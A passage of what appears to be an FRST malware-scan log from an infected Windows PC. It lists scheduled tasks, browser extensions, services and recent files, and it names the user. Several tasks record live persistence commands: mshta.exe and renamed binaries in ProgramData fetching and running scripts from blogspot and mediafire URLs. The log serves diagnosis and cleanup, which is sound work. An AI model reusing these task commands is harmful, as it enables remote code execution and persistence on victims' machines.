System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3426560 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {1F090919-B54C-4586-8E7E-66D4AE17D748} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => Powershell -noexit -command "&{$carbProgramDataPath = $env:ProgramData + '\Carbonite\Carbonite Backup\';$upgradeExe = 'CarboniteUpgrade.exe';$upgradeFullPath = $carbProgramDataPath + $upgradeExe;$logFile = 'CarboniteUpgrade.log';$logFileFullPath = $carbProgramDataPath + $logFile;$psversion = [string]$psversio (the data entry has 1818 more characters). Task: {252A0B0A-F3F9-4E27-A155-660322B33141} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [64256 2022-01-28] (Lenovo -> Lenovo Group Ltd.) Task: {26BE80AD-71D6-4CBB-9666-22D13C0B475F} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw => "C:\ProgramData\ddond.com" [Argument = "https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"] Task: {28751D4C-8F0A-4952-AD0D-509447043A15} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\f84a8bd1-7f5d-4570-8e71-9e98dfc43665 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240 2022-01-28] (Lenovo -> Lenovo Group Ltd.) Task: {31432971-0BAB-4E0B-9780-F37F894796D5} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [10387848 2016-09-03] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {3A66BFAC-D97D-478E-BD3F-4E9D90CADB49} - System32\Tasks\QBScheduledReport => C:\Program Files (x86)\Common Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [382672 2021-10-11] (Intuit, Inc. -> Intuit Inc.) Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {512DE987-41AB-47F5-828A-B2B7D00CB4E3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153752 2017-03-11] (Google Inc -> Google Inc.) Task: {51F7470A-5D84-4B13-8B32-A0E3E689309C} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [10387848 2016-09-03] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} - System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe" "hxxps://mainnewstart1mob.blogspot.com/atom.xml" Task: {5CB3741F-35C5-4387-84E8-9F4EB62C970C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1564424 2021-11-18] (Adobe Inc. -> Adobe Inc.) Task: {67871706-20E3-4C80-B9F4-B9D020657012} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {715BA06C-2606-49AB-947F-B90E72E784E2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {744E7720-08E6-4ACA-A028-1DB55159B099} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2019-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {7CB88DC5-BA16-4D87-8687-B57D2FC10F78} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [10387848 2016-09-03] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {817A5D7F-FD6B-4FF2-AA73-5AE36AA55EF7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {90566F24-977B-44B9-871D-6957883E5F09} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {96B1F419-C6B7-4BB5-B79D-94F18E72E438} - System32\Tasks\PDVDServ14 Task => C:\Program Files (x86)\CyberLink\PowerDVD14\PDVD14Serv.exe [88344 2016-07-14] (CyberLink Corp. -> CyberLink Corp.) Task: {ABCA3FA9-E8CD-4ED1-B06B-76DC9743BD25} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C4EDA42F-FEE3-4676-B5DB-157EC6956B30} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2019-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {C5D910ED-8F29-4F79-BAFE-EF66025662A3} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Task: {C93B1543-F255-4089-8829-80F7E1E7D67B} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService Task: {D755020B-7DA0-44F0-B23E-530FFFDB95B3} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-1394640484-365018484-2708498470-1001 => C:\Users\Karin Hostetler\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [88408 2021-12-29] (Lenovo (Beijing) Limited -> Lenovo Group Limited) Task: {EEFE07B3-E757-44AE-98D9-D1C700964CB5} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\1f4ef107-f801-4464-9830-d9022cee0b91 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240 2022-01-28] (Lenovo -> Lenovo Group Ltd.) Task: {F62BAAF1-3CF7-40D9-9D31-43EAA39A692C} - System32\Tasks\StartCNBM => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2019-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A} - System32\Tasks\App Explorer => C:\Users\Karin Hostetler\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe [7822896 2021-12-15] (SweetLabs Inc. -> SweetLabs, Inc) <==== ATTENTION Task: {FC5F4341-17F5-495E-82F4-08E1247DE73D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153752 2017-03-11] (Google Inc -> Google Inc.) Task: {FD27E5B1-7BCB-444D-95EB-D5C585ECAB4F} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\5f627a14-d684-44f1-a6ff-ddf187f39d2e => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240 2022-01-28] (Lenovo -> Lenovo Group Ltd.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-30] (Apple Inc. -> Apple Inc.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{a6e97a0e-0da7-4572-8df0-a43884305abc}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{e7fffc76-4e10-4a5b-982e-8e8b939e69bf}: [DhcpNameServer] 192.168.1.1 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION Edge: ======= Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] Edge Profile: C:\Users\Karin Hostetler\AppData\Local\Microsoft\Edge\User Data\Default [2022-03-22] Edge HomePage: Default -> hxxps://www.google.com/ FireFox: ======== FF DefaultProfile: 5d5hv4c2.default-1581517371004 FF ProfilePath: C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004 [2021-09-26] FF user.js: detected! => C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\user.js [2021-09-24] FF DownloadDir: I:\CLIENTS FF Extension: (ExpressVPN: VPN proxy for a better internet) - C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\firefox-addon@expressvpn.com.xpi [2021-06-22] FF Extension: (Glance Screen Sharing) - C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\glanceclient@glance.net.xpi [2021-05-24] FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\jid1-ZAdIEUB7XOzOJw@jetpack.xpi [2021-07-10] FF Extension: (LastPass: Free Password Manager) - C:\Users\Karin Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\support@lastpass.com.xpi [2021-07-01] FF HKLM\...\Firefox\Extensions: [sweb2pdfextension.3@nuance.com] - C:\Program Files (x86)\Nuance\Power PDF 21\bin\SFirefoxExtn FF Extension: (Nuance PDF Create) - C:\Program Files (x86)\Nuance\Power PDF 21\bin\SFirefoxExtn [2017-11-13] [Legacy] FF HKLM\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2019-05-02] FF HKLM-x32\...\Firefox\Extensions: [sweb2pdfextension.3@nuance.com] - C:\Program Files (x86)\Nuance\Power PDF 21\bin\SFirefoxExtn FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension FF Extension: (SmartPrintButton) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Legacy] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2017-12-16] [Legacy] [not signed] FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2019-03-01] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin-x32: @dymo.com/DymoLabelFramework -> C:\Program Files (x86)\DYMO\DYMO Label Software\Framework\npDYMOLabelFramework.dll [2016-09-13] (Sanford, L.P. -> Sanford L.P.) FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2022-03-02] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2022-03-02] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2019-03-01] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin HKU\S-1-5-21-1394640484-365018484-2708498470-1001: @zoom.us/ZoomVideoPlugin -> C:\Users\Karin Hostetler\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2017-12-21] (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default [2022-03-23] CHR DownloadDir: I:\CLIENTS CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://console.gotoassist.com; hxxps://flashymass.com; hxxps://mail.atlanticbb.net; hxxps://mail.breezeline.net; hxxps://mayolocpa.liscio.me; hxxps://time4news.net; hxxps://www.creditkarma.com; hxxps://www.reddit.com; hxxps://www.support.com; hxxps://www.truthfinder.com CHR HomePage: Default -> hxxp://www.duckduckgo.com/ CHR StartupUrls: Default -> "hxxps://calendar.google.com/calendar/u/0/r","hxxps://calendar.google.com/calendar/u/0/r/week?tab=mc" CHR Extension: (Google Drive) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-27] CHR Extension: (YouTube) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-11] CHR Extension: (Logitech Smooth Scrolling) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkpejdfnpdkhifgbancbammdijojoffk [2017-12-16] CHR Extension: (LastPass: Free Password Manager) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2022-03-22] CHR Extension: (Chrome Web Store Payments) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-05] CHR Extension: (Gmail) - C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-27] CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-05-20] CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User Data\System Profile [2019-05-20] CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-11-18] (Adobe Inc. -> Adobe Inc.) R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2019-03-01] (Adobe Systems Incorporated -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3849472 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3617024 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AUEPLauncher; C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe [43008 2019-12-04] (AMD) [File not signed] R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [270336 2012-07-13] (Brother Industries, Ltd.) [File not signed] R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth Filter ONLY\BTDevMgr.exe [125144 2016-02-15] (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.) R2 DymoPnpService; C:\Program Files (x86)\DYMO\DYMO Label Software\DymoPnpService.exe [33520 2016-09-13] (Sanford, L.P. -> Sanford, L.P.) R2 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe [437104 2021-03-22] (EXPRSVPN LLC -> ExpressVPN) R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_service.exe [614856 2021-05-15] (LogMeIn, Inc. -> LogMeIn, Inc.) S2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [136704 2009-06-24] (HP) [File not signed] R2 HPSIService; C:\WINDOWS\system32\HPSIsvc.exe [126880 2012-09-26] (Hewlett-Packard Company -> HP) R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240 2022-01-28] (Lenovo -> Lenovo Group Ltd.) R2 JME Keyboard; C:\Windows\jmesoft\Service.exe [32768 2011-08-17] () [File not signed] R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\LenovoVantageService.exe [16648 2019-12-04] (Lenovo -> Lenovo Group Ltd.) R2 LiveStorageService; C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe [730160 2016-11-22] (LENOVO -> Lenovo) R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.) R3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-12-03] (Intuit Inc.) [File not signed] R2 QBWCMonitor; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe [40784 2021-03-11] (Intuit, Inc. -> ) S3 QuickBooksDB26; C:\Program Files (x86)\Intuit\QuickBooks 2016\QBDBMgrN.exe [127792 2016-11-25] (SAP -> Intuit, Inc.) [File not signed] S3 QuickBooksDB27; C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe [134192 2019-12-15] (Intuit, Inc. -> SAP AG or an SAP affiliate company) S3 QuickBooksDB28; C:\Program Files (x86)\Intuit\QuickBooks 2018\QBDBMgrN.exe [127816 2020-12-09] (Intuit, Inc. -> SAP SE or an SAP affiliate company) S3 QuickBooksDB29; C:\Program Files (x86)\Intuit\QuickBooks 2019\QBDBMgrN.exe [127696 2021-09-17] (Intuit, Inc. -> SAP SE or an SAP affiliate company) R3 QuickBooksDB30; C:\Program Files (x86)\Intuit\QuickBooks 2020\QBDBMgrN.exe [127696 2021-09-16] (Intuit, Inc. -> SAP SE or an SAP affiliate company) R3 QuickBooksDB31; C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBDBMgrN.exe [127696 2021-10-11] (Intuit, Inc. -> SAP SE or an SAP affiliate company) R3 QuickBooksDB32; C:\Program Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe [139472 2021-08-19] (Intuit, Inc. -> SAP SE or an SAP affiliate company) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\NisSrv.exe [3046608 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MsMpEng.exe [132504 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus64.sys [30208 2018-10-23] (Microsoft Windows Hardware Compatibility Publisher -> LG Electronics Inc.) S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag64.sys [30720 2018-10-16] (Microsoft Windows Hardware Compatibility Publisher -> LG Electronics Inc.) S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem64.sys [37376 2018-10-16] (Microsoft Windows Hardware Compatibility Publisher -> LG Electronics Inc.) R2 AODDriver4.3.0; C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [60104 2015-02-19] (Advanced Micro Devices, Inc. -> Advanced Micro Devices) S3 BrSerIb; C:\WINDOWS\system32\DRIVERS\BrSerIb.sys [95344 2014-01-23] (Brother Industries, Ltd. -> Brother Industries Ltd.) S3 BrUsbSIb; C:\WINDOWS\system32\DRIVERS\BrUsbSIb.sys [21872 2014-01-23] (Brother Industries, Ltd. -> Brother Industries Ltd.) S3 expressvpnsplittunnel; C:\Program Files (x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [37024 2021-03-22] (ExprsVPN LLC -> ExpressVPN) R3 expressvpnwintun; C:\WINDOWS\System32\drivers\expressvpn-wintun.sys [46824 2021-03-22] (Express VPN International Ltd. -> ExpressVPN) S3 mvusbews; C:\WINDOWS\System32\Drivers\mvusbews.sys [20480 2012-09-26] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.) S3 tapexpressvpn; C:\WINDOWS\System32\drivers\tapexpressvpn.sys [52904 2021-03-22] (ExprsVPN LLC -> The OpenVPN Project) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49600 2022-03-14] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [26880 2015-11-12] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [439544 2022-03-14] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [90360 2022-03-14] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) (Whitelisted) ========= (If an entry is included in the fixlist, the file/folder will be moved.) 2022-03-23 08:52 - 2022-03-23 08:54 - 000000000 ____D C:\FRST 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 20:01 - 2022-03-22 20:01 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\CrashDumps 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____ C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____ C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu 2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation) C:\ProgramData\timagar.com 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 